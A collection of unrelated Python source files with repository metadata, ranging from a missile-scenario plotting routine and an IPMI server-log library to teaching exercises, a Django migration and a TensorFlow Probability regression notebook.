ax_3.legend(fontsize=fontsize, loc='center left')
ax_4.legend(fontsize=fontsize)
ax_1.tick_params(labelsize=labelsize)
ax_2.tick_params(labelsize=labelsize)
ax_3.tick_params(labelsize=labelsize)
ax_4.tick_params(labelsize=labelsize)
if savefig:
plt.savefig('scenario_motion.jpg', dpi=dpi)
plt.show()
def plot_forces_parameters(self, figsize=(15, 7), fontsize=14, labelsize=12, labelpad=0, dpi=400, savefig=False):
fig = plt.figure(figsize=figsize)
ax_1 = fig.add_subplot(1, 3, 1)
ax_2 = fig.add_subplot(1, 3, 2)
ax_3 = fig.add_subplot(1, 3, 3)
ax_1.plot(self.missile.history['t'], self.missile.history['X'], label='$X$')
ax_1.plot(self.missile.history['t'], self.missile.history['Y'], label='$Y$')
ax_1.plot(self.missile.history['t'], self.missile.history['Z'], label='$Z$')
ax_2.plot(self.missile.history['t'], self.missile.history['Mx'], label='$M_x$')
ax_2.plot(self.missile.history['t'], self.missile.history['My'], label='$M_y$')
ax_2.plot(self.missile.history['t'], self.missile.history['Mz'], label='$M_z$')
ax_3.plot(self.missile.history['t'], self.missile.history['wx'], label='ω$_x$')
ax_3.plot(self.missile.history['t'], self.missile.history['wy'], label='ω$_y$')
ax_3.plot(self.missile.history['t'], self.missile.history['wz'], label='ω$_z$')
ax_1.set_ylabel('$F$, Н', fontsize=fontsize, labelpad=labelpad)
ax_2.set_ylabel('$M$, Н∙м', fontsize=fontsize, labelpad=labelpad)
ax_3.set_ylabel('ω, рад/с', fontsize=fontsize, labelpad=labelpad)
ax_1.set_xlabel('$t$, c', fontsize=fontsize, labelpad=labelpad)
ax_2.set_xlabel('$t$, c', fontsize=fontsize, labelpad=labelpad)
ax_3.set_xlabel('$t$, c', fontsize=fontsize, labelpad=labelpad)
ax_1.set_title(label='Силы в ССК', fontdict={'fontsize': fontsize})
ax_2.set_title(label='Моменты в ССК', fontdict={'fontsize': fontsize})
ax_3.set_title(label='Угловые скорости в ССК', fontdict={'fontsize': fontsize})
ax_1.legend(fontsize=fontsize)
ax_2.legend(fontsize=fontsize)
ax_3.legend(fontsize=fontsize)
ax_1.tick_params(labelsize=labelsize)
ax_2.tick_params(labelsize=labelsize)
ax_3.tick_params(labelsize=labelsize)
if savefig:
plt.savefig('scenario_forces.jpg', dpi=dpi)
plt.show()
def _r_(self):
return np.sqrt((self.target.pos[0] - self.missile.pos[0]) ** 2 + \
(self.target.pos[1] - self.missile.pos[1]) ** 2 + \
(self.target.pos[2] - self.missile.pos[2]) ** 2)
| 43.602703 | 140 | 0.591335 |
b527465b85022ddc4c1c597ff6fb6eb0eeecc481
| 597 |
py
|
Python
|
WiSe-2122/Wiederholung/Vorlesung/datentypen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1 |
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
WiSe-2122/Wiederholung/Vorlesung/datentypen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
WiSe-2122/Wiederholung/Vorlesung/datentypen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
# Ganze Zahlen -> Integer (int)
a = 10
# Fließkommazahlen -> Float (float)
b = 4.5
# Zeichenketten -> String (str)
c = "Hallo mein Name ist Hase"
d = "und ich weiß von nichts."
# Boolean -> Bool (bool)
e = True
f = False
# Liste -> List (list)
liste = ["Hallo", # 0
"Welt", # 1
2021, # 2
True, # 3
["Liste", "in", "der", "Liste"] # 4
]
# Dictionary -> Dict (dict)
diction = {
# Key Value
"Name": "Jonas",
"Lieblingsfarbe" : "Grün"
}
# Tupel -> Tupel (tupel)
a = (11, "Peter", True)
| 19.258065 | 44 | 0.475712 |
a908548011d6d40b85b7ba95830a1bd21b4442cf
| 11,790 |
py
|
Python
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/bladelog_lib.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 5 |
2019-11-11T07:57:26.000Z
|
2022-03-28T08:26:53.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/bladelog_lib.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 3 |
2019-09-05T21:47:07.000Z
|
2019-09-17T18:10:45.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/bladelog_lib.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 11 |
2019-07-20T00:16:32.000Z
|
2022-01-11T14:17:48.000Z
|
# Copyright (C) Microsoft Corporation. All rights reserved.
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
from time import strptime
from ipmicmd_library import *
sdr_cachefile_path = "/tmp/sdrcache/"
#Check if sdcache directory exists if not create
if not os.path.exists(sdr_cachefile_path):
os.makedirs("/tmp/sdrcache")
def read_server_log_entry(serverid, entryid):
try:
log = read_server_log(serverid, False)
if "members" in log:
if str(entryid) in log["members"]:
entry = log["members"][str(entryid)]
log["members"].clear()
log["members"] = entry
else:
print "there"
log["members"].clear()
except Exception, e:
return set_failure_dict(("read_server_log_entry Exception: {0}".format(e)), completion_code.failure)
return log
def read_server_log(serverid, raw_output=True):
try:
if serverid < 1 or serverid > 48:
return set_failure_dict("Expected server-id between 1 to 48",completion_code.failure)
else:
interface = get_ipmi_interface(serverid)
if "Failed:" in interface:
return set_failure_dict(interface,completion_code.failure)
#Verify sdr cache file exists
filename = 'server' + str(serverid) + ".sdr"
filepath = sdr_cachefile_path + filename
iscache = verify_cachefile_exists(filepath, filename, interface)
if iscache == True:
#log.info("serverLog: %s cache file exists.Running commands through cache file" %fileName)
readcmd = '-S' + ' ' + filepath + ' ' + 'sel elist'
cmdinterface = interface + ' ' + readcmd
else:
#log.info("serverLog: %s cache file is not exists.Running direct commands" %fileName)
cmdinterface = interface + ' ' + 'sel elist'
read_log = parse_server_log(cmdinterface, "readserverlog",raw_output)
if read_log is None or not read_log: # Check empty or none
return set_failure_dict("Empty data for readserverlog", completion_code.failure)
except Exception, e:
#Log_Error("Failed Exception:",e)
return set_failure_dict(("readserverlog Exception: ", e),completion_code.failure)
return read_log
def read_server_log_with_timestamp(serverid, starttime, endtime,raw_output=True):
try:
if serverid < 1 or serverid > 48:
return set_failure_dict("Expected server-id between 1 to 48", completion_code.failure)
else:
interface = get_ipmi_interface(serverid)
if "Failed:" in interface:
return set_failure_dict(interface, completion_code.failure)
#Verify sdr cache file exists
filename = 'server' + str(serverid) + ".sdr"
filepath = sdr_cachefile_path + filename
iscache = verify_cachefile_exists(filepath, filename, interface)
if iscache == True:
#log.info("serverLog: %s cache file exists.Running commands through cache file" %fileName)
readcmd = '-S' + ' '+ filepath + ' ' + 'sel elist'
cmdinterface = interface + ' ' + readcmd
else:
#log.info("serverLog: %s cache file is not exists.Running direct commands" %fileName)
cmdinterface = interface + ' ' + 'sel elist'
start_time = strptime(starttime, '%m/%d/%Y-%H:%M:%S')
end_time = strptime(endtime, '%m/%d/%Y-%H:%M:%S')
if(end_time <= start_time):
return set_failure_dict("Parameter out of range",completion_code.failure)
else:
server_log = parse_read_serverlog_with_timestamp(cmdinterface, "readserverlogwithtimestamp",start_time , end_time,raw_output)
if server_log is None or not server_log: # Check empty or none
return set_failure_dict("Empty data for readserverlogwithtimestamp",completion_code.failure)
except Exception, e:
#Log_Error("Failed Exception:",e)
return set_failure_dict(("Exception: ", e), completion_code.failure)
return server_log
def clear_server_log(serverid, raw_output = True):
try:
if serverid < 1 or serverid > 48:
return set_failure_dict("Expected server-id between 1 to 48",completion_code.failure)
else:
interface = get_ipmi_interface(serverid)
if "Failed:" in interface:
return set_failure_dict(interface,completion_code.failure)
#Verify sdr cache file exists
filename = 'server' + str(serverid) + ".sdr"
filepath = sdr_cachefile_path + filename
iscache = verify_cachefile_exists(filepath, filename, interface)
if iscache == True:
#log.info("serverLog: %s cache file exists.Running commands through cache file" %fileName)
clearcmd = '-S' + ' '+ filepath + ' ' + 'sel clear'
cmdinterface = interface + ' ' + clearcmd
else:
#log.info("serverLog: %s cache file is not exists.Running direct commands" %fileName)
cmdinterface = interface + ' ' + 'sel clear'
read_log = parse_server_log(cmdinterface, "clearserverlog")
if read_log is None or not read_log: # Check empty or none
return set_failure_dict("Empty data for clearserverlog", completion_code.failure)
if (raw_output):
return read_log
else:
return set_success_dict ()
except Exception, e:
#Log_Error("Failed Exception:",e)
return set_failure_dict(("Exception: ", e), completion_code.failure)
def parse_server_log(interface , command,raw_output=True):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return output
read_serverlog = {}
if(output['status_code'] == 0 ):
if raw_output:
return output['stdout']
else:
return generate_collection(output)
else:
error_data = output['stderr']
read_serverlog[completion_code.cc_key] = completion_code.failure
read_serverlog[completion_code.desc] = error_data.split(":")[-1]
return read_serverlog
except Exception, e:
#log.exception("serverLog Command: %s Exception error is: %s ", command, e)
#print "Failed to parse serverlog results. Exception: " ,e
return set_failure_dict(("serverLog: Exception: ",e) , completion_code.failure)
def parse_read_serverlog_with_timestamp(interface , command, starttime, endtime,raw_output=True):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return output
read_serverlog = {}
filtered_serverlog = []
if(output['status_code'] == 0 ):
read_logdata = output['stdout'].split('\n')
read_loglist = filter(None, read_logdata) # Removes empty strings
if(len(read_loglist) > 0):
for log in read_loglist:
# getting each log time and date stamp
datetime_part = log.split('|', 3) # Gets first 3 strings
logtime = datetime_part[1].strip() + datetime_part[2].strip() # combining date and time
logtime_obj = strptime(logtime, '%m/%d/%Y%H:%M:%S')
if (logtime_obj >= starttime) and (logtime_obj <= endtime):
filtered_serverlog.append(log)
else:
if raw_output:
return read_logdata
else:
return generate_collection(output)
if(len(filtered_serverlog) > 0):
if raw_output:
return "\n".join(filtered_serverlog)
else:
return generate_collection("\n".join(filtered_serverlog))
else:
print "No logs found returning all the logs"
return "\n".join(read_loglist)
else:
error_data = output['stderr']
read_serverlog[completion_code.cc_key] = completion_code.failure
read_serverlog[completion_code.desc] = error_data.split(":")[-1]
return read_serverlog
except Exception, e:
#log.exception("serverLog Command: %s Exception error is: %s " ,command ,e)
#print "Failed to parse serverlog results. Exception: " , e
return set_failure_dict(("serverLog: Exception: ",e) , completion_code.failure)
def generate_collection(output):
try:
logRsp = {}
if(output['status_code'] == 0):
sdata = output['stdout'].split('\n')
logRsp["members"]={}
for value in sdata:
if value:
d=''
t=''
tmp={}
for idx, val in enumerate(value.split("|")):
if idx ==0:
tmp["Id"] = str(int(val.strip(), 16))
tmp["RecordId"] = str(int(val.strip(), 16))
if idx == 1:
d = val.strip()
if idx == 2:
t= val.strip()
if idx == 3:
tmp["MessageId"] = val.strip()
if idx == 4:
tmp["Message"] = val.strip()
if idx == 5:
tmp["EntryCode"] = val.strip()
if idx == 6:
tmp["MessageArgs"] = val.strip()
tmp["Name"] = "Blade SEL log entry"
tmp["EntryType"] = "SEL"
tmp["Created"] = d+'T'+t
logRsp["members"].update({tmp["Id"]: tmp })
logRsp[completion_code.cc_key] = completion_code.success
return logRsp
else:
logFailedRsp = {}
errorData = output['stderr'].split('\n')
logFailedRsp[completion_code.cc_key] = completion_code.failure
for data in errorData:
if "Error" in data:
logFailedRsp[completion_code.desc] = data.split(":")[-1]
elif "Completion Code" in data:
logFailedRsp[completion_code.ipmi_code] = data.split(":")[-1]
return logFailedRsp
except Exception, e:
return set_failure_dict(("ServerLog: Exception: ",e) , completion_code.failure)
| 41.957295 | 140 | 0.536302 |
8d5c88c8530781b29f177f0e32a1b2cb1420bfa7
| 6,081 |
py
|
Python
|
Webpage/arbeitsstunden/migrations/0002_auto_20210616_1733.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
Webpage/arbeitsstunden/migrations/0002_auto_20210616_1733.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | 46 |
2022-01-08T12:03:24.000Z
|
2022-03-30T08:51:05.000Z
|
Webpage/arbeitsstunden/migrations/0002_auto_20210616_1733.py
|
ASV-Aachen/Website
|
bbfc02d71dde67fdf89a4b819b795a73435da7cf
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.1.12 on 2021-06-16 17:33
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('arbeitsstunden', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='account',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('isNew', models.BooleanField(default=False)),
('hasShortenedHours', models.BooleanField(default=False)),
('name', models.CharField(default='TESTNUTZER', max_length=256)),
],
),
migrations.CreateModel(
name='costCenter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('description', models.CharField(max_length=500)),
],
),
migrations.CreateModel(
name='customHours',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customHours', models.IntegerField(null=True)),
('percentege', models.IntegerField(default=100)),
],
),
migrations.CreateModel(
name='project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('description', models.CharField(blank=True, max_length=500)),
('planedHours', models.IntegerField(blank=True)),
('aktiv', models.BooleanField(default=True)),
('costCenter', models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='arbeitsstunden.costcenter')),
('responsible', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='season',
fields=[
('year', models.IntegerField(primary_key=True, serialize=False)),
('hours', models.IntegerField()),
],
),
migrations.CreateModel(
name='subproject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=256)),
('description', models.CharField(max_length=500)),
('voluntary', models.BooleanField(default=False)),
('planed', models.BooleanField(default=True)),
('endDate', models.DateField(blank=True, null=True)),
('planedHours', models.IntegerField(blank=True)),
],
),
migrations.CreateModel(
name='work',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hours', models.IntegerField(default=0)),
('description', models.CharField(max_length=500)),
('date', models.DateField()),
('setupDate', models.DateField(default=datetime.date.today)),
('employee', models.ManyToManyField(blank=True, to='arbeitsstunden.account')),
],
),
migrations.RemoveField(
model_name='arbeitseinheit',
name='Ausschreibung',
),
migrations.RemoveField(
model_name='arbeitseinheit',
name='Beteiligte',
),
migrations.RemoveField(
model_name='arbeitseinheit',
name='Projekt',
),
migrations.RemoveField(
model_name='arbeitsstundenausschreibung',
name='Projekt',
),
migrations.RemoveField(
model_name='arbeitsstundenausschreibung',
name='Tags',
),
migrations.RemoveField(
model_name='projekt',
name='Saison',
),
migrations.RemoveField(
model_name='projekt',
name='Verantwortlich',
),
migrations.DeleteModel(
name='Arbeitsbeteiligung',
),
migrations.DeleteModel(
name='Arbeitseinheit',
),
migrations.DeleteModel(
name='Arbeitsstundenausschreibung',
),
migrations.DeleteModel(
name='Projekt',
),
migrations.DeleteModel(
name='Saison',
),
migrations.AddField(
model_name='subproject',
name='parts',
field=models.ManyToManyField(blank=True, to='arbeitsstunden.work'),
),
migrations.AddField(
model_name='subproject',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='arbeitsstunden.project'),
),
migrations.AddField(
model_name='project',
name='season',
field=models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='arbeitsstunden.season'),
),
migrations.AddField(
model_name='project',
name='tags',
field=models.ManyToManyField(blank=True, to='arbeitsstunden.tag'),
),
migrations.AddField(
model_name='customhours',
name='season',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='arbeitsstunden.season'),
),
migrations.AddField(
model_name='customhours',
name='used_account',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='arbeitsstunden.account'),
),
]
| 38.487342 | 128 | 0.560763 |
a5c600219c88a633d16d1461b3ea2bb047e75b0b
| 449 |
py
|
Python
|
Python/Exercícios_Python/062_progressão_aritmética_v2.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/062_progressão_aritmética_v2.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/062_progressão_aritmética_v2.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""062 - Progressão Aritmética v2
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1_o5XXKh0Ge_AYEklX_SKZ2g0R2GXpMba
"""
p = int(input('Informe o primeiro termo de uma PA: '))
r = int(input('Informe a razão da PA: '))
resultado = str(p)
decimo = p + (10 - 1) * r
while p < decimo:
p += r
resultado += ' → ' + str(p)
print(resultado, end=' → Fim.')
| 22.45 | 77 | 0.652561 |
574888371f1e0c4e63827d78bc2f6019c0b9f9e4
| 3,781 |
py
|
Python
|
lib/settings_manager.py
|
jyurkiw/EncounterRoller
|
42d036874f6b65bb276003fc9c166917464e4a3b
|
[
"MIT"
] | null | null | null |
lib/settings_manager.py
|
jyurkiw/EncounterRoller
|
42d036874f6b65bb276003fc9c166917464e4a3b
|
[
"MIT"
] | null | null | null |
lib/settings_manager.py
|
jyurkiw/EncounterRoller
|
42d036874f6b65bb276003fc9c166917464e4a3b
|
[
"MIT"
] | null | null | null |
from genericpath import exists
import json
import os
import pathlib
class SettingsManager(object):
PCS_NUM = 'pcs_num'
PCS_LEVEL = 'pcs_level'
ENC_NUM = 'enc_num'
CURRENT_TABLE = 'cur_tbl'
def __init__(self):
# Detect linux/mac vs windows. Fuck solaris.
if os.name == 'posix':
self.settings_path = os.path.expanduser(os.path.join('~', '.5eERrc'))
if os.name == 'nt':
self.settings_path = os.path.expanduser(os.path.join('~', 'AppData', 'Local', 'EncounterRoller5e'))
self.settings_file_path = os.path.join(self.settings_path, 'settings.json')
self.tables_file_path = os.path.join(self.settings_path, 'tables')
settings = self.read_settings_file()
self._num_characters = settings[SettingsManager.PCS_NUM]
self._level_characters = settings[SettingsManager.PCS_LEVEL]
self._encounter_num = settings[SettingsManager.ENC_NUM]
self._current_table = settings[SettingsManager.CURRENT_TABLE]
def read_settings_file(self):
"""Read settings file and return parsed contents.
"""
if not os.path.exists(self.settings_file_path):
self.write_settings_file({
SettingsManager.PCS_NUM: 5,
SettingsManager.PCS_LEVEL: 1,
SettingsManager.ENC_NUM: 1,
SettingsManager.CURRENT_TABLE: None
})
with open(self.settings_file_path, 'r') as settings_file:
settings = json.loads(settings_file.read())
return settings
def write_settings_file(self, settings):
"""Write out modified settings data to settings file.
"""
pathlib.Path(self.settings_path).mkdir(parents=True, exist_ok=True)
with open(self.settings_file_path, 'w') as settings_file:
settings_file.write(json.dumps(settings, indent=4))
def set_setting(self, key, value):
"""Set and save a setting.
It would be more efficient to make all changes and then write once,
but this is simple, it works, and it's incredibly durable.
"""
settings = self.read_settings_file()
settings[key] = value
self.write_settings_file(settings)
@property
def number_of_characters(self):
return self._num_characters
@number_of_characters.setter
def number_of_characters(self, value):
self._num_characters = value
self.set_setting(SettingsManager.PCS_NUM, value)
@property
def level_of_characters(self):
return self._level_characters
@level_of_characters.setter
def level_of_characters(self, value):
self._level_characters = value
self.set_setting(SettingsManager.PCS_LEVEL, value)
@property
def number_of_encounters(self):
return self._num_characters
@number_of_encounters.setter
def number_of_encounters(self, value):
self._encounter_num = value
self.set_setting(SettingsManager.ENC_NUM, value)
@property
def current_table(self):
return self._current_table
@current_table.setter
def current_table(self, value):
self._current_table = value
self.set_setting(SettingsManager.CURRENT_TABLE, value)
def set(self, args):
"""Handle the set operation from the command line.
"""
if args.num_characters:
self.number_of_characters = args.num_characters
if args.party_level:
self.level_of_characters = args.party_level
def __str__(self) -> str:
return '\nNumber of Characters:\t{0}\nCharacter Level:\t{1}\nCurrent Table:\t\t{2}'.format(
self.number_of_characters,
self.level_of_characters,
self._current_table
)
| 35.009259 | 111 | 0.659349 |
93a4b91fd07881d9e84c6505270ab1ca90fb655b
| 1,460 |
py
|
Python
|
marsyas-vamp/marsyas/scripts/large-evaluators/onset_strength_check.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/large-evaluators/onset_strength_check.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/large-evaluators/onset_strength_check.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import sys
import glob
import os
import numpy
import pylab
def oss(filename, outdirname):
basename = os.path.basename(filename)
outfilename = os.path.join(outdirname,
os.path.splitext(basename)[0] + "-oss.txt")
if not os.path.exists(outfilename):
cmd = "tempo -m TEST_OSS_FLUX %s" % (filename)
os.system(cmd)
os.rename("onset_strength.txt", outfilename)
return outfilename
def score_oss(ground_onsets, outfilename):
print outfilename
oss = numpy.loadtxt(outfilename)
oss = oss[:,2]
# correction for the 15th order (16 coefficients) FIR filter
oss = oss[8:]
ground = numpy.loadtxt(ground_onsets)
ground_samples = ground * (44100.0/128)
ground_plot = numpy.zeros(len(oss))
height = max(oss)
for gs in ground_samples:
ground_plot[gs] = height
pylab.plot(oss)
pylab.plot(ground_plot)
pylab.show()
def main():
indirname = sys.argv[1]
outdirname = sys.argv[2]
if not os.path.exists(outdirname):
os.makedirs(outdirname)
filenames = glob.glob(os.path.join(indirname, "*.wav"))
#pairs = []
for filename in filenames:
#for filename in filenames[:1]:
outfilename = oss(filename, outdirname)
### assume they're all .wav
ground_onsets = filename[:-4] + ".txt"
#pairs.append( (ground_onsets, outfilename) )
score_oss(ground_onsets, outfilename)
main()
| 25.172414 | 64 | 0.647945 |
19564588c71adc73ce9c53e12b3a611121a4bad0
| 410 |
py
|
Python
|
warp/workspace/build_pipe.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
warp/workspace/build_pipe.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
warp/workspace/build_pipe.py
|
j-helland/warp
|
2a71346f0ec4d4e6fd45ed3b5e972b683724287c
|
[
"Unlicense"
] | null | null | null |
# std
# extern
# warp
from warp.workspace import Workspace
# types
__all__ = []
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--session-id', required=True)
parser.add_argument('--target', required=True)
args = parser.parse_args()
ws = Workspace(session_id=args.session_id)
ws.build(args.target, warp_backfill_call=True)
| 17.083333 | 54 | 0.697561 |
270efca34f3e7d1885851fc74d30e40a777e400f
| 680 |
py
|
Python
|
exercises/pt/test_04_12_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/test_04_12_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/pt/test_04_12_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
def test():
assert (
len(doc1.ents) == 2 and len(doc2.ents) == 2 and len(doc3.ents) == 2
), "Devem haver duas entidades em cada exemplo."
assert any(
e.label_ == "PERSON" and e.text == "PewDiePie" for e in doc2.ents
), "Você rotulou PERSON corretamente?"
assert any(
e.label_ == "PERSON" and e.text == "Alexis Ohanian" for e in doc3.ents
), "Você rotulou PERSON corretamente?"
__msg__.good(
"Bom trabalho! Após incluir ambos os exemplos nas novas entidades de WEBSITE"
"além de manter as entidades já identificadas como por exemplo PERSON,"
"o modelo está apresentando resultados muito melhores."
)
| 40 | 85 | 0.642647 |
27a2c1e9c8cb8da6ec8f2e6383ccdc2278ba08fe
| 175 |
py
|
Python
|
ListenUp/app.py
|
kkysen/Soft-Dev
|
b19881b1fcc9c7daefc817e6b975ff6bce545d81
|
[
"Apache-2.0"
] | null | null | null |
ListenUp/app.py
|
kkysen/Soft-Dev
|
b19881b1fcc9c7daefc817e6b975ff6bce545d81
|
[
"Apache-2.0"
] | null | null | null |
ListenUp/app.py
|
kkysen/Soft-Dev
|
b19881b1fcc9c7daefc817e6b975ff6bce545d81
|
[
"Apache-2.0"
] | null | null | null |
__authors__ = ['Khyber Sen', 'Bayan Berri', 'Naotaka Kinoshita', 'Brian Leung']
__date__ = '2017-10-30'
from core import app
if __name__ == '__main__':
app.run()
| 21.875 | 80 | 0.645714 |
d0cb0801e4bea85214c13aec8e062c324cd6b2b4
| 664 |
py
|
Python
|
src/bo4e/enum/gebiettyp.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/gebiettyp.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/gebiettyp.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
# pylint:disable=missing-module-docstring
from bo4e.enum.strenum import StrEnum
class Gebiettyp(StrEnum):
"""
List of possible Gebiettypen.
"""
REGELZONE = "REGELZONE" #: Regelzone
MARKTGEBIET = "MARKTGEBIET" #: Marktgebiet
BILANZIERUNGSGEBIET = "BILANZIERUNGSGEBIET" #: Bilanzierungsgebiet
VERTEILNETZ = "VERTEILNETZ" #: Verteilnetz
TRANSPORTNETZ = "TRANSPORTNETZ" #: Transportnetz
REGIONALNETZ = "REGIONALNETZ" #: Regionalnetz
AREALNETZ = "AREALNETZ" #: Arealnetz
GRUNDVERSORGUNGSGEBIET = "GRUNDVERSORGUNGSGEBIET" #: Grundversorgungsgebiet
VERSORGUNGSGEBIET = "VERSORGUNGSGEBIET" #: Versorgungsgebiet
| 33.2 | 80 | 0.725904 |
efd83cda4056e7bcf6fbc513a598991d75dba1ed
| 140 |
py
|
Python
|
diversos/reduce.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 1 |
2021-12-18T15:29:24.000Z
|
2021-12-18T15:29:24.000Z
|
diversos/reduce.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | null | null | null |
diversos/reduce.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 3 |
2021-08-23T22:45:20.000Z
|
2022-02-17T13:17:09.000Z
|
from functools import reduce
def somar (x, y ):
return x + y
lista = [1,3,5,7,9 , 11, 13 ]
soma = reduce (somar , lista)
print(soma)
| 17.5 | 30 | 0.614286 |
4be4a79b845c9c4d144b840a18ee92f49791dffb
| 9,882 |
py
|
Python
|
TensorflowProbability/nonlinear_regression.py
|
stanton119/data-analysis
|
b6fda815c6cc1798ba13a5d2680369b7e5dfcdf9
|
[
"Apache-2.0"
] | null | null | null |
TensorflowProbability/nonlinear_regression.py
|
stanton119/data-analysis
|
b6fda815c6cc1798ba13a5d2680369b7e5dfcdf9
|
[
"Apache-2.0"
] | 1 |
2021-02-11T23:44:52.000Z
|
2021-02-11T23:44:52.000Z
|
TensorflowProbability/nonlinear_regression.py
|
stanton119/data-analysis
|
b6fda815c6cc1798ba13a5d2680369b7e5dfcdf9
|
[
"Apache-2.0"
] | 1 |
2021-12-16T01:02:23.000Z
|
2021-12-16T01:02:23.000Z
|
# %% [markdown]
# # Linear regression to non linear probabilistic neural network
# In this post I will attempt to go over the steps between a simple linear regression
# towards a non-linear probabilistic model built with a neural network.
#
# This is particularly useful in case where the model noise changes with one of the model variables or is non-linear,
# such as in those with heteroskedasticity.
#
# Import stuff:
# %%
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow_probability as tfp
import matplotlib.pyplot as plt
plt.style.use("seaborn-whitegrid")
# %% [markdown]
# Let's generate some data with non-linearities that would pose some issues for a linear regression solution:
# %% Generate linear regression data with heteroskedasticity
# amount of noise that is added is a function of x
n = 20000
x = np.random.uniform(-10, 10, size=n)
noise_std = np.sin(x * 0.4) + 1
y = (
-0.5
+ 1.3 * x
+ 3 * np.cos(x * 0.5)
+ np.random.normal(loc=0, scale=noise_std)
)
x_train = x[: n // 2]
x_test = x[n // 2 :]
y_train = y[: n // 2]
